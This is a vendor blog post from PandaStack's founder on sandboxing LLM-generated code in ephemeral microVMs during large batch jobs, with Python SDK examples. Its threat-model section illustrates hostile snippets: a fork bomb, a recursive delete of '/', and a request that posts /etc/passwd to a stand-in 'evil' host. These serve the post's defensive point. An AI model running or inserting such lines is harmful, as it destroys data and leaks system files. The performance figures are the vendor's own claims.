all posts

Sandboxing LLM Batch Post-Processing at Scale

Ajay Kumar··9 min read

You run an LLM over 50,000 inputs. Support tickets, PDFs, product rows, scraped pages — pick your dataset. For most of them the model doesn't just answer; it emits code. "Parse this invoice into JSON." "Normalize this address with a regex." "Run this transform over the row." "Here's a Python snippet that computes the answer." Now you have a second problem stacked on top of the first: something has to *execute* those per-item snippets, and that something is model-generated code you have never seen and cannot review before it runs. The clean answer is a pool of ephemeral microVMs — one sandbox per item (or per batch), exec the generated code, read the result back out, destroy the VM — and the only reason that's affordable at 50,000 items is that a PandaStack create is a snapshot restore, not a cold boot.

This is a use-case guide, not a generic interpreter tutorial. We'll build the fan-out loop with the Python SDK, talk through the throughput and economics that make per-item VMs actually work, cover how to bound a runaway item with ttl_seconds, how to read structured results back out, and — the decision people get wrong — when one shared sandbox per batch is enough versus one VM per item. I'm Ajay; I built PandaStack, and I'll be honest about where the trade-offs sit.

Why you can't run per-item generated code on your worker host

The shortcut is to take the model's snippet, `exec()` it in your batch worker, and move on to the next row. At item #1 this works. At item #4,197 the model — prompted by a weird input, a jailbreak buried in a scraped page, or just its own bad day — emits `while True: os.fork()`, or `shutil.rmtree('/')`, or a quiet `requests.post('http://evil/', data=open('/etc/passwd').read())`. Your worker process is now a fork bomb, a wiped disk, or an exfiltration client. And because a batch worker is long-lived and shared, that one poisoned item takes down every item queued behind it on the same box.

The failure modes compound in a batch specifically because the volume is the whole point:

  • You cannot review 50,000 snippets. The entire value of the pipeline is that a human isn't in the loop. "We'll sanity-check the code first" doesn't survive contact with the batch size.
  • One bad item shouldn't fail the batch. On a shared worker, an infinite loop or an OOM from item N stalls or kills items N+1..50000. You want the blast radius to be exactly one item.
  • State leaks between items. A snippet that writes to /tmp, mutates a global, or leaves a process running poisons the next item's run on the same worker — the flaky-CI problem, but per row.
  • A subprocess or container isn't a real boundary. A shared-kernel container still shares the kernel; a fork bomb or a kernel exploit from item N reaches the host. You want a hardware boundary you can throw away.

A microVM is a different category of answer. On PandaStack every sandbox boots its own guest kernel under Firecracker — the same VMM behind AWS Lambda and Fargate — so the blast radius of arbitrary per-item code is one disposable VM with its own memory, filesystem, and network namespace. Item #4,197's fork bomb hits the walls of a 2 GiB microVM you're about to delete, the item is marked failed, and item #4,198 starts in a pristine VM that never saw it.

The rule that governs the whole design: never execute model-emitted code in the process that's orchestrating the batch. The orchestrator holds your credentials, your queue, and every other item's data. The generated code runs in the VM; the orchestrator only ever creates VMs, hands them code, and reads results back. Cross that line and one hostile item owns your pipeline.

The fan-out pattern: a pool of ephemeral microVMs

The shape is a bounded worker pool over your items. Each worker, for each item it pulls, does five things and nothing else:

  1. Create a sandbox from a template — ideally a snapshot with your libraries already baked in, so there's no per-item install.
  2. Get the item in: write the input data and the model's generated code into the VM's filesystem.
  3. Exec the generated code with a timeout. It returns stdout, stderr, and an exit code.
  4. Read the result back out: a structured JSON file off the filesystem, or stdout if the output is small.
  5. Destroy the sandbox. Nothing survives — that's the point. The next item gets a fresh VM.

The concurrency of the pool is a dial you set: N workers means at most N live VMs at once, which is how you cap memory pressure on the fleet while still chewing through the batch in parallel. Because each VM is disposable, you never write cleanup code between items — a corrupted VM is deleted, not scrubbed. The only thing that escapes an item's VM is the result you deliberately read out.

A per-item fan-out loop in Python

Here's the whole pattern: a bounded pool of workers, one throwaway sandbox per item, the model's generated code exec'd against the item's data, a structured result read back off the filesystem, and a guaranteed teardown. Set PANDASTACK_API_KEY in the environment first. `generate_code(item)` is your LLM call — whatever produces the per-item snippet — and is deliberately left as the boring part.

import json
from concurrent.futures import ThreadPoolExecutor, as_completed
from pandastack import PandaStack

ps = PandaStack()  # reads PANDASTACK_API_KEY, base url https://api.pandastack.ai

POOL_SIZE = 32          # at most 32 live microVMs at once -> caps fleet memory
ITEM_BUDGET_SECONDS = 20


def process_item(item: dict) -> dict:
    """One item = one throwaway microVM. Runs the model's generated code and
    reads a structured result back out. Never touches the orchestrator host."""
    code = generate_code(item)  # your LLM call: emits a Python snippet for this item

    # 1. Fresh, hardware-isolated VM. ttl_seconds is a hard self-destruct backstop
    #    so a hung or malicious item can't outlive its budget even if we crash.
    sb = ps.sandboxes.create(
        template="code-interpreter",         # scientific stack baked into the snapshot
        ttl_seconds=ITEM_BUDGET_SECONDS + 10,
        metadata={"item_id": item["id"], "kind": "batch-postprocess"},
    )
    try:
        # 2. Item data + generated code go INTO the VM. The snippet writes its
        #    answer to /work/result.json so we read structured output, not scraped text.
        sb.filesystem.write("/work/input.json", json.dumps(item).encode())
        sb.filesystem.write("/work/run.py", code.encode())

        # 3. Exec with a timeout. This is the ONLY place untrusted code runs.
        r = sb.exec("cd /work && python3 run.py", timeout_seconds=ITEM_BUDGET_SECONDS)
        if r.exit_code != 0:
            return {"id": item["id"], "ok": False, "error": r.stderr[-500:]}

        # 4. Read the structured result back out of the VM.
        out = sb.filesystem.read("/work/result.json")
        return {"id": item["id"], "ok": True, "result": json.loads(out)}
    except Exception as e:
        # A fork bomb / OOM / timeout lands here. One item fails; the batch does not.
        return {"id": item["id"], "ok": False, "error": str(e)}
    finally:
        # 5. Always destroy. #4,197's `while True: os.fork()` dies with this VM.
        sb.delete()


def run_batch(items: list[dict]) -> list[dict]:
    results = []
    with ThreadPoolExecutor(max_workers=POOL_SIZE) as pool:
        futures = {pool.submit(process_item, it): it for it in items}
        for fut in as_completed(futures):
            results.append(fut.result())
    return results


# results = run_batch(load_items())  # 50,000 items, 32 at a time, each in its own VM
# ok = sum(1 for r in results if r["ok"]); print(f"{ok}/{len(results)} succeeded")

Notice what the orchestrator never does: it never runs the model's code, never trusts an exit code to be zero, and never assumes the result file exists. Every item is wrapped in create/try/finally so a failure is a data point (`ok: False`), not a batch-killer. Swap the ThreadPoolExecutor for your queue worker or a Celery/RQ task and the shape is identical — the unit of work is "one item, one VM, read result, delete."

Why a VM per item is affordable at 50,000 items

The instinct is that a VM per item is absurdly expensive — VMs are supposed to be heavy. That instinct is calibrated on cold-booting a full VM, which takes seconds and holds a warm pool of idle capacity you pay for around the clock. PandaStack breaks both assumptions.

  • Create is a snapshot restore, not a cold boot: a create runs at ~179ms p50 (~203ms p99), because the heavy lifting is a ~49ms snapshot-restore step against a baked template, not a multi-second cold boot. Only the very first spawn of a fresh template pays the ~3s cold boot to bake the snapshot; every item after that restores.
  • No warm pool to pay for: there are no idle VMs kept hot waiting for work. A VM exists for the ~seconds an item runs, then it's gone. Between batches your microVM cost is effectively zero — you pay for the work, not for standby capacity.
  • Copy-on-write memory and disk: restoring the Nth identical VM doesn't copy gigabytes. Guest memory is MAP_PRIVATE (pages copy only on write) and the rootfs is an XFS reflink clone, so 32 concurrent code-interpreter VMs share the baked pages until each one writes.
  • Plenty of address space: an agent pre-allocates 16,384 /30 subnets, so a per-item-VM pool has enormous headroom before networking is the bottleneck. The real ceiling is host memory and CPU, which your POOL_SIZE dial controls directly.

Put it together: at ~179ms per create with no warm-pool tax, the fixed overhead of "give this item its own hardware-isolated VM" is a fraction of a second and a few cents' worth of memory for a few seconds. The dominant cost of the batch stays what it should be — the LLM inference and the actual per-item work — not VM provisioning. That's the whole reason per-item isolation is a default here rather than a luxury.

The key insight: strong isolation is normally a trade-off against throughput — real VMs are slow to spin up, so you pool and share them, which reweakens the isolation. Snapshot-restore plus no-warm-pool removes the trade-off. You get a fresh, hardware-isolated kernel per item in sub-second time, so "a clean VM for every row" costs you almost nothing.

Bounding each item so one row can't run forever

In a batch, the failure you must plan for is the item that never finishes: an accidental infinite loop, a scan over more data than you expected, a snippet that waits on a network call that never returns. Two layers keep a single item from stalling the whole run.

  • exec timeout_seconds is your inner circuit breaker. When the generated code exceeds it, the exec returns and the item is marked failed — the loop moves on. Set it to a realistic per-item budget; model-written code loops more than you'd like.
  • ttl_seconds on create is the outer backstop. The VM self-destructs after its TTL no matter what — even if your orchestrator process crashes mid-item and never calls delete(). Set it a little above the exec budget so the timeout normally fires first and the TTL only catches orphans.
  • Cap concurrency with POOL_SIZE. This is your memory governor: N live VMs is the most memory the batch can pin at once. It also naturally rate-limits how fast a pathological batch can spawn VMs.
  • Lock down egress if exfiltration is in your threat model. A microVM still has a network namespace; restrict outbound at the network layer so a hostile snippet can't POST your data out, rather than trusting the code not to.

The combination is what lets you walk away from a 50,000-item batch overnight. The worst an individual item can do is burn its own time budget inside its own VM and get marked failed — it cannot hang the batch, and thanks to ttl_seconds it cannot leak a live VM even if your driver dies.

Reading structured results back out

Parsing free-form stdout across 50,000 items is a losing game — one stray print statement and your regex is wrong for 4% of the batch. Have the generated code write a structured file to a known path and read that back instead, exactly like the loop above did with /work/result.json.

# What you prompt the model to emit for each item: read input, do the work,
# write a JSON result. stdout is for debugging; result.json is the contract.
generated_snippet = '''
import json
with open("/work/input.json") as f:
    item = json.load(f)

# ... the model's per-item logic: parse, transform, extract, compute ...
answer = {"invoice_total": 4213.55, "currency": "USD", "line_items": 7}

with open("/work/result.json", "w") as f:
    json.dump(answer, f)
print("ok")  # goes to stdout; the real result is the file
'''

# In the worker: confirm exit_code == 0 (non-zero usually means the file was
# never written), then read the file. Never trust that result.json exists.
r = sb.exec("cd /work && python3 run.py", timeout_seconds=20)
if r.exit_code == 0:
    result = json.loads(sb.filesystem.read("/work/result.json"))
else:
    result = {"error": r.stderr[-500:]}  # feed back to the model to self-correct

The `filesystem.read` returns raw bytes, so the same pattern covers any artifact an item produces — a cleaned CSV, a rendered chart PNG, a parquet slice — not just JSON. And handing `stderr` back to the model on failure is most of what makes these pipelines feel robust: a snippet that hits `KeyError: 'Region'` gets the error, fixes the casing, and you retry that single item without disturbing the batch.

One VM per item vs one shared VM per batch

A fresh VM per item is the safe default, but it isn't always the right granularity. The dial is: how much do you trust the code, and how independent are the items? Three configurations cover almost everything.

  • One sandbox per item — Isolation: maximum; a hostile or crashing item can't touch any other. Overhead: one ~179ms create + delete per item. Best when: the per-item code is fully untrusted (jailbreaks, scraped inputs), items must not see each other's data (multi-tenant), or a crash must never cascade. This is the default for anything with a real threat model.
  • One shared sandbox per batch (or per chunk) — Isolation: items share a VM, so they can leak state to each other, but the batch is still fully isolated from your host and from other batches. Overhead: amortized — one create for the whole chunk, then N execs. Best when: all items in a batch belong to the same trust domain (your own data, your own trusted transform), throughput matters more than per-item isolation, and the code is idempotent enough that state bleed doesn't corrupt results. Reap the VM between chunks to bound drift.
  • Your own worker thread, no sandbox — Isolation: none; code runs on your host. Overhead: zero. Best when: the code is NOT model-generated — it's a fixed transform you wrote and trust. Don't spin up a VM to run code you already control; that's just latency for no security gain.

A useful middle path is per-batch VMs with hard resets: create one sandbox per chunk of, say, 100 same-tenant items, exec each item's code against it, and delete-and-recreate the VM every chunk so state can't accumulate across the whole run. You get most of the isolation of per-item with a fraction of the create overhead. The moment items cross trust or tenant boundaries, though, go back to one VM per item — the ~179ms create is cheap enough that there's rarely a good reason to share a VM across untrusted inputs.

Audit story for free: with one VM per item, "what could have touched this item's data" has a one-word answer — that VM, and it no longer exists. With a shared batch VM you at least know the blast radius is that batch's trust domain and nothing else on your fleet. Either way the orchestrator host stays clean because it never ran the code.

Honest limits and when not to reach for this

Per-item VMs cost memory while they're live, so the POOL_SIZE dial matters — size it to your fleet's RAM, not to your ambitions. If your items are tiny and the code is trivial and trusted, the create overhead can dominate the actual work; that's exactly the case for a shared batch VM or no sandbox at all. And if an item's dataset is genuinely huge, a single VM's RAM is the ceiling — push the heavy scan into DuckDB over a file (out-of-core) or pre-aggregate upstream rather than loading everything into one guest.

But for the shape this post is about — an LLM emitting code you can't review, over inputs you don't fully trust, at a volume no human can babysit — a pool of ephemeral microVMs is the cleanest answer I know of. One disposable VM per item (or per trusted chunk), a hard time budget, a structured result read back out, and item #4,197's fork bomb becomes a single `ok: False` in your results array instead of a 3 a.m. page. That's the whole trick: make strong isolation cheap enough that you stop rationing it.

Frequently asked questions

How do I safely execute the code an LLM generates for each item in a batch?

Run each item's generated code in its own ephemeral microVM, never in your batch worker process. With PandaStack, create a sandbox on the code-interpreter template with a ttl_seconds backstop, write the item's data and the model's snippet into the VM's filesystem, exec the snippet with a timeout, then read a structured result file back out with filesystem.read and delete the VM. A bounded thread/queue pool caps how many VMs run at once. Because each item gets its own Firecracker guest kernel, a malicious or runaway snippet is contained to one disposable VM rather than your host or the rest of the batch.

Isn't creating a microVM for every one of thousands of items too expensive?

Not on a snapshot-restore platform. PandaStack creates a sandbox in about 179ms at p50 (~203ms p99) by restoring a baked template snapshot rather than cold-booting, and there's no warm pool of idle VMs to pay for — a VM exists only while an item runs, then it's gone. Memory is copy-on-write (MAP_PRIVATE) and the rootfs is an XFS reflink clone, so concurrent identical VMs share baked pages until they write. The fixed overhead per item is a fraction of a second and a few seconds of memory, so the dominant cost stays your LLM inference and the actual per-item work.

How do I stop one item's generated code from running forever or hanging the whole batch?

Use two layers. Pass timeout_seconds to exec as the inner circuit breaker — when the generated code exceeds it, the exec returns and you mark that item failed and move on. Set ttl_seconds on create as the outer backstop so the VM self-destructs even if your orchestrator crashes and never calls delete(). Cap concurrency with your pool size to govern total memory, and wrap each item in try/finally so a fork bomb, OOM, or timeout becomes a single failed item rather than a batch-killer. If exfiltration is a concern, also restrict the guest's network egress.

When is one shared sandbox per batch enough instead of one VM per item?

Share a sandbox across a batch (or chunk) when all the items belong to the same trust domain — your own data, a transform you wrote, no cross-tenant mixing — and throughput matters more than per-item isolation. You amortize one create over many execs. Go back to one VM per item when the code is fully untrusted (jailbreaks, scraped inputs), items must not see each other's data, or a crash must never cascade. A middle path is per-chunk VMs that you delete and recreate every N items so state can't accumulate. Since a create is only ~179ms, there's rarely a good reason to share a VM across untrusted inputs.

How do I read structured results back out of each item's sandbox?

Prompt the model to write its answer to a known path like /work/result.json instead of relying on stdout, then in the worker confirm exec returned exit_code 0 (non-zero usually means the file was never written) and call sandbox.filesystem.read('/work/result.json'), which returns raw bytes you json.loads. The same pattern covers any artifact — a cleaned CSV, a chart PNG, a parquet slice. On failure, hand stderr back to the model so it can self-correct and retry just that single item without disturbing the rest of the batch.

Run code in a microVM in one API call.

49ms p50 cold start. Fork, snapshot, and scale to zero.

Start free
Written by Ajay Kumar, Founder, PandaStack.